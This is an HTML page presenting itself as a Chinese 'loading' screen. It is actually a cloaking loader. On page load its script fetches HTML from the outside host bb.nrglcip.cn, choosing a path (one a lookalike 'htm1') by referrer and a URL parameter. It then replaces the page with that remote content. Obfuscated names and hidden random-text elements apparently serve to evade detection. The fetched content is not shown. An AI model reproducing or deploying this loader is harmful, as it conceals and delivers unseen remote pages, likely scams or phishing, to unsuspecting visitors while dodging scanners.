<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MdXVZ48fgCw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MdXVZ48fgCw .GeVcz27A {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MdXVZ48fgCw .content {
            line-height: 50px;
            text-align: center
        }

        .MdXVZ48fgCw .img {
            width: 100%
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 {
            text-align: center
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MdXVZ48fgCw .ujNd0MZf8v5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MdXVZ48fgCw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GRuIgndHzH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var c3Ilaf = GRuIgndHzH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ c3Ilaf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ c3Ilaf +".html?a=share";
		}
		
        MEj3J1BWq=url+"#"+new Date().getTime();
        MEj3J1BWq && function() {
            $.get(MEj3J1BWq, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >ORIPPqYVRYcL1xSVXOMrQlLNkhz2JpoTV</h1>
<span style='display:none'>MEa3oSD1Hdn1uYMEsrzK8l9rpK8SLEQUWQhoRJzJz09AxIrqGXmEq7JbusU7xQgsyLQO0raSfiNz7QDLt2GG8qy8UQ</span>
<li style='display:none' >VFH12a5W6DkXZS8JxSWqtnpcmvmTOibODcUnCzR4SJiYvzJ</li>
<span style='display:none'>MEa3oSD1Hdn1uYMEsrzK8l9rpK8SLEQUWQhoRJzJz09AxIrqGXmEq7JbusU7xQgsyLQO0raSfiNz7QDLt2GG8qy8UQ</span>
<b style='display:none' >VbK4npcwbnkGzFDmR8Bo</b>
<ul style='display:none' >czVtkJ9olYNvv1IMM</ul>
<img  src='' style='display:none'>
<b style='display:none' >VbK4npcwbnkGzFDmR8Bo</b>
<ul style='display:none' >czVtkJ9olYNvv1IMM</ul><div class="MdXVZ48fgCw">
    <div class="GeVcz27A">
        <div class="ujNd0MZf8v5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >ahSMK7R0WksH9rfZdVBuhYzHHyH7WUB8RMorp92hX3uSKfcLZchKiABDQ79EUvBLXQ</b>
<h1 style='display:none' >byzzQKHtx2wuLZP4OvzxTCXWNc52Ords8gvfsVwT0</h1>
<a  href='#' style='display:none'>nTlliSJHWhfEI2quQRosrkohwV9</a>
<img  src='' style='display:none'></body>
</html>